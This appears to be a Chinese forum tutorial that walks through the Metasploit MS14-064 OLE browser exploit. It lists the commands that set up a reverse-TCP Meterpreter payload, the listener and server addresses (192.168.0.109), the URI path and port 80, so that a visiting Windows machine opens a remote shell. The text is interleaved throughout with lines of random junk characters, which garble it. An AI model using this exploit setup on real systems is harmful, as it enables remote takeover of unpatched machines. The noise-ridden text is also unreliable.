( h) w) z/ K" h: e7 |: e 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示2 C* h$ C: X$ p9 F% [( T& ~7 ~: t
+ L; ]9 A5 N& }. o- d' O
8 G8 L9 _+ B2 ]7 u; K( G8 W
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
9 ?/ F" b" X+ S
9 [6 L# u6 ]7 P$ Q; E8 y5 i: X: L5 J2 V% m9 Q' _1 P- C. G3 n+ `, }- o
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
$ g- P+ q0 F4 t* y5 ~: Y0 c# o* B# E- \
: B( c5 u( p( O3 W) z$ @$ d4 M& |7 M& ?. z; o/ i, Y2 ~
set AllowPowershellPrompt true/ x2 f9 a; n. d) L
6 j+ E* R8 V6 u8 J1 x9 I
) ^ e1 o! x/ M* G+ r2 R; @
Set LHOST 192.168.0.109
4 a- u& {. t1 e; P- N! j
) C+ t( q" H1 L3 Z1 v: i
4 W- M/ D2 a4 h& g G5 v5 y+ e6 z0 g2 { set SRVHOST 192.168.0.109
; V4 v2 m- A- T( ?8 Y! L6 J1 R4 i1 K
9 w% f& v2 H9 M- A1 g2 Y
% W: d! `, A0 y: L: a
Set uripath share4 q: g# \) ^ B0 B- A; ~' X6 A
: t3 ~' d2 H- Y, R% T9 ]3 e, a0 A2 I# e
Set srvport 80
" n2 J" M; u/ [/ b( I8 ^
; b' f) X7 i2 f0 T, ?
4 y+ H/ z7 |) a9 P4 X1 n! E9 M: D7 F
* |% x/ Q V' l& \; p6 @
2 a5 }7 p; p. t ~1 B
+ U7 I3 ~2 R: \3 I
! S- i2 i t% e$ F% ]
; Z# N( V* ~: O
# F5 U9 N2 z2 \4 P
3 }* i# R @. n4 j, [$ m; R
- T- s2 ]- c8 W5 \: K2 O% K
6 ~4 Y: A6 W- w' w+ P" ? A+ f
( } @ N) m" r% O0 G
8 o0 {" \' G0 i1 u/ k
' ?# i- @5 J8 O9 M 1 Q ^2 s- |+ N- j/ B
' t7 o' m, U# t: U
0 X# | z' Z4 l! a( d* l 下面我们来访问本地地址如图:- K5 d$ h3 p6 [4 @9 E4 w f
: w. D( h5 Y. e6 v6 R' q4 D3 t! J ]9 E, y- @! m
- Z9 J( L/ n) S4 I( S
, j1 ]5 Y4 \! S2 F
5 C( F! h. ]/ R* {: P
! X8 n4 Y) W+ k, }, U; @
& E8 K. @# p1 ?5 x# d# Y4 N
9 {% X# p- u- W2 s+ G
; A( j# v( a. J" z. U( p y" C